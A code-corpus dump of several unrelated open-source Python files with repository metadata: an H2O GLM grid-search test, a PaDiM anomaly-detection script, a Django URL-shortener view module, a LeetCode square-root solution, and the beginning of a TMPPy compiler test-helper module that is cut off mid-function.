self.hyper_params["max_runtime_secs"] = [0.3] # arbitrarily set to 0.1 second
# fire off random grid-search
grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
# bool indicating if randomized grid search has calculated the early stopping condition correctly
stopped_correctly = \
pyunit_utils.evaluate_metrics_stopping(grid_model.models, metric_name, bigger_is_better, search_criteria,
self.possible_number_models)
if stopped_correctly:
print("test4_glm_random_grid_search_metric " + metric_name + ": passed. ")
else:
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test4_glm_random_grid_search_metric " + metric_name + ": failed. ")
self.test_num += 1
def test_random_grid_search_for_glm():
"""
Create and instantiate classes, call test methods to test randomize grid search for GLM Gaussian
or Binomial families.
:return: None
"""
# randomize grid search for Gaussian
test_glm_gaussian_random_grid = Test_glm_random_grid_search("gaussian")
test_glm_gaussian_random_grid.test1_glm_random_grid_search_model_number("mse(xval=True)") # this test must be run.
test_glm_gaussian_random_grid.test2_glm_random_grid_search_max_model()
test_glm_gaussian_random_grid.test3_glm_random_grid_search_max_runtime_secs()
test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("MSE", False)
# test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("r2", True) # R2 was removed as a stopping metric
# test_glm_gaussian_random_grid.tear_down() # obsolete
# exit with error if any tests have failed
if test_glm_gaussian_random_grid.test_failed > 0:
sys.exit(1)
else:
pyunit_utils.remove_files(os.path.join(test_glm_gaussian_random_grid.current_dir,
test_glm_gaussian_random_grid.json_filename))
if __name__ == "__main__":
pyunit_utils.standalone_test(test_random_grid_search_for_glm)
else:
test_random_grid_search_for_glm()
| 53.324444 | 121 | 0.67257 | [
"Apache-2.0"
] | 13927729580/h2o-3 | h2o-py/dynamic_tests/testdir_algos/glm/pyunit_glm_gaussian_gridsearch_randomdiscrete_large.py | 23,996 | Python |
import random
from random import sample
import argparse
import numpy as np
import os
import pickle
from tqdm import tqdm
from collections import OrderedDict
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import precision_recall_curve
from sklearn.covariance import LedoitWolf
from scipy.spatial.distance import mahalanobis
from scipy.ndimage import gaussian_filter
from skimage import morphology
from skimage.segmentation import mark_boundaries
import matplotlib.pyplot as plt
import matplotlib
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision.models import wide_resnet50_2, resnet18
import datasets.mvtec as mvtec
# device setup
use_cuda = torch.cuda.is_available()
device = torch.device('cuda' if use_cuda else 'cpu')
def parse_args():
parser = argparse.ArgumentParser('PaDiM')
parser.add_argument('--data_path', type=str, default='D:/dataset/mvtec_anomaly_detection')
parser.add_argument('--save_path', type=str, default='./mvtec_result')
parser.add_argument('--arch', type=str, choices=['resnet18', 'wide_resnet50_2'], default='wide_resnet50_2')
return parser.parse_args()
def main():
args = parse_args()
# load model
if args.arch == 'resnet18':
model = resnet18(pretrained=True, progress=True)
t_d = 448
d = 100
elif args.arch == 'wide_resnet50_2':
model = wide_resnet50_2(pretrained=True, progress=True)
t_d = 1792
d = 550
model.to(device)
model.eval()
random.seed(1024)
torch.manual_seed(1024)
if use_cuda:
torch.cuda.manual_seed_all(1024)
idx = torch.tensor(sample(range(0, t_d), d))
# set model's intermediate outputs
outputs = []
def hook(module, input, output):
outputs.append(output)
model.layer1[-1].register_forward_hook(hook)
model.layer2[-1].register_forward_hook(hook)
model.layer3[-1].register_forward_hook(hook)
os.makedirs(os.path.join(args.save_path, 'temp_%s' % args.arch), exist_ok=True)
# fig, ax = plt.subplots(1, 2, figsize=(20, 10))
# fig_img_rocauc = ax[0]
# fig_pixel_rocauc = ax[1]
total_roc_auc = []
total_pixel_roc_auc = []
for class_name in mvtec.CLASS_NAMES:
train_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=True)
train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)
test_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=False)
test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)
train_outputs = OrderedDict([('layer1', []), ('layer2', []), ('layer3', [])])
test_outputs = OrderedDict([('layer1', []), ('layer2', []), ('layer3', [])])
# extract train set features
train_feature_filepath = os.path.join(args.save_path, 'temp_%s' % args.arch, 'train_%s.pkl' % class_name)
if not os.path.exists(train_feature_filepath):
for (x, _, _) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(train_outputs.keys(), outputs):
train_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in train_outputs.items():
train_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = train_outputs['layer1']
for layer_name in ['layer2', 'layer3']:
embedding_vectors = embedding_concat(embedding_vectors, train_outputs[layer_name])
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate multivariate Gaussian distribution
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W)
mean = torch.mean(embedding_vectors, dim=0).numpy()
cov = torch.zeros(C, C, H * W).numpy()
I = np.identity(C)
for i in range(H * W):
# cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_
cov[:, :, i] = np.cov(embedding_vectors[:, :, i].numpy(), rowvar=False) + 0.01 * I
# save learned distribution
train_outputs = [mean, cov]
with open(train_feature_filepath, 'wb') as f:
pickle.dump(train_outputs, f)
else:
print('load train set feature from: %s' % train_feature_filepath)
with open(train_feature_filepath, 'rb') as f:
train_outputs = pickle.load(f)
gt_list = []
gt_mask_list = []
test_imgs = []
# extract test set features
for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):
test_imgs.extend(x.cpu().detach().numpy())
gt_list.extend(y.cpu().detach().numpy())
gt_mask_list.extend(mask.cpu().detach().numpy())
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(test_outputs.keys(), outputs):
test_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in test_outputs.items():
test_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = test_outputs['layer1']
for layer_name in ['layer2', 'layer3']:
embedding_vectors = embedding_concat(embedding_vectors, test_outputs[layer_name])
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate distance matrix
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W).numpy()
dist_list = []
for i in range(H * W):
mean = train_outputs[0][:, i]
conv_inv = np.linalg.inv(train_outputs[1][:, :, i])
dist = [mahalanobis(sample[:, i], mean, conv_inv) for sample in embedding_vectors]
dist_list.append(dist)
dist_list = np.array(dist_list).transpose(1, 0).reshape(B, H, W)
# upsample
dist_list = torch.tensor(dist_list)
score_map = F.interpolate(dist_list.unsqueeze(1), size=x.size(2), mode='bilinear',
align_corners=False).squeeze().numpy()
# apply gaussian smoothing on the score map
for i in range(score_map.shape[0]):
score_map[i] = gaussian_filter(score_map[i], sigma=4)
# Normalization
max_score = score_map.max()
min_score = score_map.min()
scores = (score_map - min_score) / (max_score - min_score)
# calculate image-level ROC AUC score
img_scores = scores.reshape(scores.shape[0], -1).max(axis=1)
gt_list = np.asarray(gt_list)
fpr, tpr, _ = roc_curve(gt_list, img_scores)
img_roc_auc = roc_auc_score(gt_list, img_scores)
total_roc_auc.append(img_roc_auc)
print('image ROCAUC: %.3f' % (img_roc_auc))
fig_img_rocauc.plot(fpr, tpr, label='%s img_ROCAUC: %.3f' % (class_name, img_roc_auc))
# get optimal threshold
gt_mask = np.asarray(gt_mask_list)
precision, recall, thresholds = precision_recall_curve(gt_mask.flatten(), scores.flatten())
a = 2 * precision * recall
b = precision + recall
f1 = np.divide(a, b, out=np.zeros_like(a), where=b != 0)
threshold = thresholds[np.argmax(f1)]
# calculate per-pixel level ROCAUC
fpr, tpr, _ = roc_curve(gt_mask.flatten(), scores.flatten())
per_pixel_rocauc = roc_auc_score(gt_mask.flatten(), scores.flatten())
total_pixel_roc_auc.append(per_pixel_rocauc)
print('pixel ROCAUC: %.3f' % (per_pixel_rocauc))
# fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc))
# save_dir = args.save_path + '/' + f'pictures_{args.arch}'
# os.makedirs(save_dir, exist_ok=True)
# plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name)
print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.title.set_text('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.legend(loc="lower right")
print('Average pixel ROCUAC: %.3f' % np.mean(total_pixel_roc_auc))
fig_pixel_rocauc.title.set_text('Average pixel ROCAUC: %.3f' % np.mean(total_pixel_roc_auc))
fig_pixel_rocauc.legend(loc="lower right")
fig.tight_layout()
fig.savefig(os.path.join(args.save_path, 'roc_curve.png'), dpi=100)
def plot_fig(test_img, scores, gts, threshold, save_dir, class_name):
num = len(scores)
vmax = scores.max() * 255.
vmin = scores.min() * 255.
for i in range(num):
img = test_img[i]
img = denormalization(img)
gt = gts[i].transpose(1, 2, 0).squeeze()
heat_map = scores[i] * 255
mask = scores[i]
mask[mask > threshold] = 1
mask[mask <= threshold] = 0
kernel = morphology.disk(4)
mask = morphology.opening(mask, kernel)
mask *= 255
vis_img = mark_boundaries(img, mask, color=(1, 0, 0), mode='thick')
fig_img, ax_img = plt.subplots(1, 5, figsize=(12, 3))
fig_img.subplots_adjust(right=0.9)
norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax)
for ax_i in ax_img:
ax_i.axes.xaxis.set_visible(False)
ax_i.axes.yaxis.set_visible(False)
ax_img[0].imshow(img)
ax_img[0].title.set_text('Image')
ax_img[1].imshow(gt, cmap='gray')
ax_img[1].title.set_text('GroundTruth')
ax = ax_img[2].imshow(heat_map, cmap='jet', norm=norm)
ax_img[2].imshow(img, cmap='gray', interpolation='none')
ax_img[2].imshow(heat_map, cmap='jet', alpha=0.5, interpolation='none')
ax_img[2].title.set_text('Predicted heat map')
ax_img[3].imshow(mask, cmap='gray')
ax_img[3].title.set_text('Predicted mask')
ax_img[4].imshow(vis_img)
ax_img[4].title.set_text('Segmentation result')
left = 0.92
bottom = 0.15
width = 0.015
height = 1 - 2 * bottom
rect = [left, bottom, width, height]
cbar_ax = fig_img.add_axes(rect)
cb = plt.colorbar(ax, shrink=0.6, cax=cbar_ax, fraction=0.046)
cb.ax.tick_params(labelsize=8)
font = {
'family': 'serif',
'color': 'black',
'weight': 'normal',
'size': 8,
}
cb.set_label('Anomaly Score', fontdict=font)
fig_img.savefig(os.path.join(save_dir, class_name + '_{}'.format(i)), dpi=100)
plt.close()
def denormalization(x):
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
x = (((x.transpose(1, 2, 0) * std) + mean) * 255.).astype(np.uint8)
return x
def embedding_concat(x, y):
B, C1, H1, W1 = x.size()
_, C2, H2, W2 = y.size()
s = int(H1 / H2)
x = F.unfold(x, kernel_size=s, dilation=1, stride=s)
x = x.view(B, C1, -1, H2, W2)
z = torch.zeros(B, C1 + C2, x.size(2), H2, W2)
for i in range(x.size(2)):
z[:, :, i, :, :] = torch.cat((x[:, :, i, :, :], y), 1)
z = z.view(B, -1, H2 * W2)
z = F.fold(z, kernel_size=s, output_size=(H1, W1), stride=s)
return z
if __name__ == '__main__':
main()
| 38.963696 | 113 | 0.615704 | [
"Apache-2.0"
] | yamaneco28/PaDiM-Anomaly-Detection-Localization-master | main.py | 11,806 | Python |
from django.http import JsonResponse, HttpResponseRedirect
from rest_framework.decorators import api_view
from sdk.key_generation import generate_random_key
from sdk.storage import create_storage
from sdk.url import URL, ModelValidationError
storage = create_storage()
@api_view(['GET'])
def go_to(request, key, format=None):
url = storage.get(key)
if not url:
return JsonResponse(status=404, data={
'error': 'key not found'
})
return HttpResponseRedirect(redirect_to=url.address)
@api_view(['POST'])
def shorten(request, format=None):
raw_url = request.data.get('url')
if not raw_url:
return JsonResponse(status=400, data={
'error': 'missing url parameter'
})
try:
url = URL.parse(raw_url)
except ModelValidationError as e:
return JsonResponse(status=400, data={
'error': 'invalid URL',
'details': e.message
})
key = _store_url_and_get_key(url)
return JsonResponse(status=200, data={
'key': key
})
def _store_url_and_get_key(url):
while True:
key = generate_random_key()
if storage.set(key, url):
break
return key
| 23.823529 | 58 | 0.64856 | [
"MIT"
] | mkorman9/cndsr | backend/backend/views.py | 1,215 | Python |
# PROBLEM LINK:- https://leetcode.com/problems/sqrtx/
class Solution:
def mySqrt(self, x):
a = 1e-6
low = 1
high = x
while high - low > a:
mid = (high + low)/2
if mid * mid < x:
low = mid
else:
high = mid
return int(high)
| 22.333333 | 53 | 0.426866 | [
"MIT"
] | HassanRahim26/LEETCODE | SEARCHING/EASY/Sqrt(x)/Code.py | 335 | Python |
#!/usr/bin/env python3
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import os
import tempfile
import unittest
import textwrap
import re
import sys
import itertools
import subprocess
from functools import wraps
import difflib
import pytest
import py2tmp_test_config as config
import typed_ast.ast3 as ast
from _py2tmp import (
ast_to_ir3,
ir3_to_ir2,
ir2_to_ir1,
ir1_to_ir0,
optimize_ir3,
optimize_ir0,
ir0_to_cpp,
ir0,
utils,
)
def pretty_print_command(command):
return ' '.join('"' + x + '"' for x in command)
def add_line_numbers(source_code):
lines = source_code.splitlines()
last_line_num_length = len(str(len(lines)))
return '\n'.join('%%%sd: %%s' % last_line_num_length % (n + 1, line) for n, line in enumerate(lines))
class CommandFailedException(Exception):
def __init__(self, command, stdout, stderr, error_code):
self.command = command
self.stdout = stdout
self.stderr = stderr
self.error_code = error_code
def __str__(self):
return textwrap.dedent('''\
Ran command: {command}
Exit code {error_code}
Stdout:
{stdout}
Stderr:
{stderr}
''').format(command=pretty_print_command(self.command), error_code=self.error_code, stdout=self.stdout, stderr=self.stderr)
def run_command(executable, args=[]):
command = [executable] + args
print('Executing command:', pretty_print_command(command))
try:
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
(stdout, stderr) = p.communicate()
except Exception as e:
raise Exception("While executing: %s" % command)
if p.returncode != 0:
raise CommandFailedException(command, stdout, stderr, p.returncode)
print('Execution successful.')
print('stdout:')
print(stdout)
print('')
print('stderr:')
print(stderr)
print('')
return (stdout, stderr)
def run_compiled_executable(executable):
run_command(executable)
class CompilationFailedException(Exception):
def __init__(self, command, error_message):
self.command = command
self.error_message = error_message
def __str__(self):
return textwrap.dedent('''\
Ran command: {command}
Error message:
{error_message}
''').format(command=pretty_print_command(self.command), error_message=self.error_message)
class PosixCompiler:
def __init__(self):
self.executable = config.CXX
self.name = config.CXX_COMPILER_NAME
def compile_discarding_output(self, source, include_dirs, args=[]):
try:
args = args + ['-c', source, '-o', os.path.devnull]
self._compile(include_dirs, args=args)
except CommandFailedException as e:
raise CompilationFailedException(e.command, e.stderr)
def compile_and_link(self, source, include_dirs, output_file_name, args=[]):
self._compile(
include_dirs,
args = (
[source]
+ args
+ ['-o', output_file_name]
))
def _compile(self, include_dirs, args):
include_flags = ['-I%s' % include_dir for include_dir in include_dirs]
args = (
['-W', '-Wall', '-g0', '-Werror', '-std=c++11']
+ include_flags
+ args
)
run_command(self.executable, args)
class MsvcCompiler:
def __init__(self):
self.executable = config.CXX
self.name = config.CXX_COMPILER_NAME
def compile_discarding_output(self, source, include_dirs, args=[]):
try:
args = args + ['/c', source]
self._compile(include_dirs, args = args)
except CommandFailedException as e:
# Note that we use stdout here, unlike above. MSVC reports compilation warnings and errors on stdout.
raise CompilationFailedException(e.command, e.stdout)
def compile_and_link(self, source, include_dirs, output_file_name, args=[]):
self._compile(
include_dirs,
args = (
[source]
+ args
+ ['/Fe' + output_file_name]
))
def _compile(self, include_dirs, args):
include_flags = ['-I%s' % include_dir for include_dir in include_dirs]
args = (
['/nologo', '/FS', '/W4', '/D_SCL_SECURE_NO_WARNINGS', '/WX']
+ include_flags
+ args
)
run_command(self.executable, args)
if config.CXX_COMPILER_NAME == 'MSVC':
compiler = MsvcCompiler()
py2tmp_error_message_extraction_regex = 'error C2338: (.*)'
else:
compiler = PosixCompiler()
py2tmp_error_message_extraction_regex = 'static.assert(.*)'
_assert_helper = unittest.TestCase()
def _create_temporary_file(file_content, file_name_suffix=''):
file_descriptor, file_name = tempfile.mkstemp(text=True, suffix=file_name_suffix)
file = os.fdopen(file_descriptor, mode='w')
file.write(file_content)
file.close()
return file_name
def _cap_to_lines(s, n):
lines = s.splitlines()
if len(lines) <= n:
return s
else:
return '\n'.join(lines[0:n] + ['...'])
def try_remove_temporary_file(filename):
try:
os.remove(filename)
except:
# When running tests on Windows using Appveyor, the remove command fails for temporary files sometimes.
# This shouldn't cause the tests to fail, so we ignore the exception and go ahead.
pass
def expect_cpp_code_compile_error_helper(check_error_fun, tmppy_source, module_ir2, module_ir1, cxx_source):
source_file_name = _create_temporary_file(cxx_source, file_name_suffix='.cpp')
try:
compiler.compile_discarding_output(
source=source_file_name,
include_dirs=[config.MPYL_INCLUDE_DIR],
args=[])
pytest.fail(textwrap.dedent('''\
The test should have failed to compile, but it compiled successfully.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
''').format(tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cxx_source = add_line_numbers(cxx_source)),
pytrace=False)
except CompilationFailedException as e1:
e = e1
error_message = e.error_message
error_message_lines = error_message.splitlines()
# Different compilers output a different number of spaces when pretty-printing types.
# When using libc++, sometimes std::foo identifiers are reported as std::__1::foo.
normalized_error_message = error_message.replace(' ', '').replace('std::__1::', 'std::')
normalized_error_message_lines = normalized_error_message.splitlines()
error_message_head = _cap_to_lines(error_message, 40)
check_error_fun(e, error_message_lines, error_message_head, normalized_error_message_lines)
try_remove_temporary_file(source_file_name)
def expect_cpp_code_generic_compile_error(expected_error_regex, tmppy_source, module_ir2, module_ir1, cxx_source):
"""
Tests that the given source produces the expected error during compilation.
:param expected_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param cxx_source: The second part of the source code. This will be dedented.
"""
expected_error_regex = expected_error_regex.replace(' ', '')
def check_error(e, error_message_lines, error_message_head, normalized_error_message_lines):
for line in normalized_error_message_lines:
if re.search(expected_error_regex, line):
return
pytest.fail(
textwrap.dedent('''\
Expected error {expected_error} but the compiler output did not contain that.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source:
{cxx_source}
''').format(expected_error = expected_error_regex,
compiler_command=e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head),
pytrace=False)
expect_cpp_code_compile_error_helper(check_error, tmppy_source, module_ir2, module_ir1, cxx_source)
def expect_cpp_code_compile_error(
expected_py2tmp_error_regex,
expected_py2tmp_error_desc_regex,
tmppy_source,
module_ir2,
module_ir1,
cxx_source):
"""
Tests that the given source produces the expected error during compilation.
:param expected_py2tmp_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param expected_py2tmp_error_desc_regex: A regex used to match the _py2tmp error description,
e.g. 'No explicit binding was found for C, and C is an abstract class'.
:param source_code: The C++ source code. This will be dedented.
:param ignore_deprecation_warnings: A boolean. If True, deprecation warnings will be ignored.
"""
if '\n' in expected_py2tmp_error_regex:
raise Exception('expected_py2tmp_error_regex should not contain newlines')
if '\n' in expected_py2tmp_error_desc_regex:
raise Exception('expected_py2tmp_error_desc_regex should not contain newlines')
expected_py2tmp_error_regex = expected_py2tmp_error_regex.replace(' ', '')
def check_error(e, error_message_lines, error_message_head, normalized_error_message_lines):
for line_number, line in enumerate(normalized_error_message_lines):
match = re.search('tmppy::impl::(.*Error<.*>)', line)
if match:
actual_py2tmp_error_line_number = line_number
actual_py2tmp_error = match.groups()[0]
if config.CXX_COMPILER_NAME == 'MSVC':
# MSVC errors are of the form:
#
# C:\Path\To\header\foo.h(59): note: see reference to class template instantiation 'tmppy::impl::MyError<X, Y>' being compiled
# with
# [
# X=int,
# Y=double
# ]
#
# So we need to parse the following few lines and use them to replace the placeholder types in the tmppy error type.
try:
replacement_lines = []
if normalized_error_message_lines[line_number + 1].strip() == 'with':
for line in itertools.islice(normalized_error_message_lines, line_number + 3, None):
line = line.strip()
if line == ']':
break
if line.endswith(','):
line = line[:-1]
replacement_lines.append(line)
for replacement_line in replacement_lines:
match = re.search('([A-Za-z0-9_-]*)=(.*)', replacement_line)
if not match:
raise Exception('Failed to parse replacement line: %s' % replacement_line) from e
(type_variable, type_expression) = match.groups()
actual_py2tmp_error = re.sub(r'\b' + type_variable + r'\b', type_expression, actual_py2tmp_error)
except Exception:
raise Exception('Failed to parse MSVC template type arguments')
break
else:
pytest.fail(
textwrap.dedent('''\
Expected error {expected_error} but the compiler output did not contain user-facing _py2tmp errors.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
''').format(expected_error = expected_py2tmp_error_regex,
compiler_command = e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head),
pytrace=False)
for line_number, line in enumerate(error_message_lines):
match = re.search(py2tmp_error_message_extraction_regex, line)
if match:
actual_static_assert_error_line_number = line_number
actual_static_assert_error = match.groups()[0]
break
else:
pytest.fail(
textwrap.dedent('''\
Expected error {expected_error} but the compiler output did not contain static_assert errors.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
''').format(expected_error = expected_py2tmp_error_regex,
compiler_command=e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head),
pytrace=False)
try:
regex_search_result = re.search(expected_py2tmp_error_regex, actual_py2tmp_error)
except Exception as e:
raise Exception('re.search() failed for regex \'%s\'' % expected_py2tmp_error_regex) from e
if not regex_search_result:
pytest.fail(
textwrap.dedent('''\
The compilation failed as expected, but with a different error type.
Expected _py2tmp error type: {expected_py2tmp_error_regex}
Error type was: {actual_py2tmp_error}
Expected static assert error: {expected_py2tmp_error_desc_regex}
Static assert was: {actual_static_assert_error}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
'''.format(expected_py2tmp_error_regex = expected_py2tmp_error_regex,
actual_py2tmp_error = actual_py2tmp_error,
expected_py2tmp_error_desc_regex = expected_py2tmp_error_desc_regex,
actual_static_assert_error = actual_static_assert_error,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head)),
pytrace=False)
try:
regex_search_result = re.search(expected_py2tmp_error_desc_regex, actual_static_assert_error)
except Exception as e:
raise Exception('re.search() failed for regex \'%s\'' % expected_py2tmp_error_desc_regex) from e
if not regex_search_result:
pytest.fail(
textwrap.dedent('''\
The compilation failed as expected, but with a different error message.
Expected _py2tmp error type: {expected_py2tmp_error_regex}
Error type was: {actual_py2tmp_error}
Expected static assert error: {expected_py2tmp_error_desc_regex}
Static assert was: {actual_static_assert_error}
Error message:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
'''.format(expected_py2tmp_error_regex = expected_py2tmp_error_regex,
actual_py2tmp_error = actual_py2tmp_error,
expected_py2tmp_error_desc_regex = expected_py2tmp_error_desc_regex,
actual_static_assert_error = actual_static_assert_error,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head)),
pytrace=False)
# 6 is just a constant that works for both g++ (<=6.0.0 at least) and clang++ (<=4.0.0 at least).
# It might need to be changed.
if actual_py2tmp_error_line_number > 6 or actual_static_assert_error_line_number > 6:
pytest.fail(
textwrap.dedent('''\
The compilation failed with the expected message, but the error message contained too many lines before the relevant ones.
The error type was reported on line {actual_py2tmp_error_line_number} of the message (should be <=6).
The static assert was reported on line {actual_static_assert_error_line_number} of the message (should be <=6).
Error message:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
'''.format(actual_py2tmp_error_line_number = actual_py2tmp_error_line_number,
actual_static_assert_error_line_number = actual_static_assert_error_line_number,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = error_message_head)),
pytrace=False)
for line in error_message_lines[:max(actual_py2tmp_error_line_number, actual_static_assert_error_line_number)]:
if re.search('tmppy::impl', line):
pytest.fail(
'The compilation failed with the expected message, but the error message contained some metaprogramming types in the output (besides Error). Error message:\n%s' + error_message_head,
pytrace=False)
expect_cpp_code_compile_error_helper(check_error, tmppy_source, module_ir2, module_ir1, cxx_source)
def expect_cpp_code_success(tmppy_source, module_ir2, module_ir1, cxx_source):
"""
Tests that the given source compiles and runs successfully.
:param source_code: The C++ source code. This will be dedented.
"""
if 'main(' not in cxx_source:
cxx_source += textwrap.dedent('''
int main() {
}
''')
source_file_name = _create_temporary_file(cxx_source, file_name_suffix='.cpp')
executable_suffix = {'posix': '', 'nt': '.exe'}[os.name]
output_file_name = _create_temporary_file('', executable_suffix)
e = None
try:
compiler.compile_and_link(
source=source_file_name,
include_dirs=[config.MPYL_INCLUDE_DIR],
output_file_name=output_file_name,
args=[])
except CommandFailedException as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The generated C++ source did not compile.
Compiler command line: {compiler_command}
Error message was:
{error_message}
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source:
{cxx_source}
''').format(compiler_command=e.command,
tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2 = str(module_ir2),
tmppy_ir1 = str(module_ir1),
cxx_source = add_line_numbers(cxx_source),
error_message = _cap_to_lines(e.stderr, 40)),
pytrace=False)
try:
run_compiled_executable(output_file_name)
except CommandFailedException as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The generated C++ executable did not run successfully.
stderr was:
{error_message}
TMPPy source:
{tmppy_source}
C++ source:
{cxx_source}
''').format(tmppy_source = add_line_numbers(tmppy_source),
cxx_source = add_line_numbers(cxx_source),
error_message = _cap_to_lines(e.stderr, 40)),
pytrace=False)
# Note that we don't delete the temporary files if the test failed. This is intentional, keeping them around helps debugging the failure.
try_remove_temporary_file(source_file_name)
try_remove_temporary_file(output_file_name)
def _get_function_body(f):
source_code, _ = inspect.getsourcelines(f)
# Skip the annotation and the line where the function is defined.
expected_line = 'def %s():\n' % f.__name__
while source_code[0] != expected_line:
source_code = source_code[1:]
source_code = source_code[1:]
# The body of some tests is a multiline string because they would otherwise cause the pytest test file to fail
# parsing.
if source_code[0].strip() == '\'\'\'' and source_code[-1].strip() == '\'\'\'':
source_code = source_code[1:-1]
return textwrap.dedent(''.join(source_code))
def create_identifier_generator():
def identifier_generator_fun():
for i in itertools.count():
yield 'TmppyInternal_%s' % i
return iter(identifier_generator_fun())
def _convert_tmppy_source_to_ir(python_source, identifier_generator):
filename='<unknown>'
source_ast = ast.parse(python_source, filename)
module_ir3 = ast_to_ir3.module_ast_to_ir3(source_ast, filename, python_source.splitlines())
module_ir3 = optimize_ir3.optimize_module(module_ir3)
module_ir2 = ir3_to_ir2.module_to_ir2(module_ir3, identifier_generator)
module_ir1 = ir2_to_ir1.module_to_ir1(module_ir2)
return module_ir2, module_ir1
def _convert_to_cpp_expecting_success(tmppy_source):
identifier_generator = create_identifier_generator()
try:
module_ir2, module_ir1 = _convert_tmppy_source_to_ir(tmppy_source, identifier_generator)
e = None
except ast_to_ir3.CompilationError as e1:
e = e1
if e:
pytest.fail(
textwrap.dedent('''\
The conversion from TMPPy to C++ failed.
stderr was:
{error_message}
TMPPy source:
{tmppy_source}
''').format(tmppy_source = add_line_numbers(tmppy_source),
error_message = e.args[0]),
pytrace=False)
try:
header = ir1_to_ir0.module_to_ir0(module_ir1, identifier_generator)
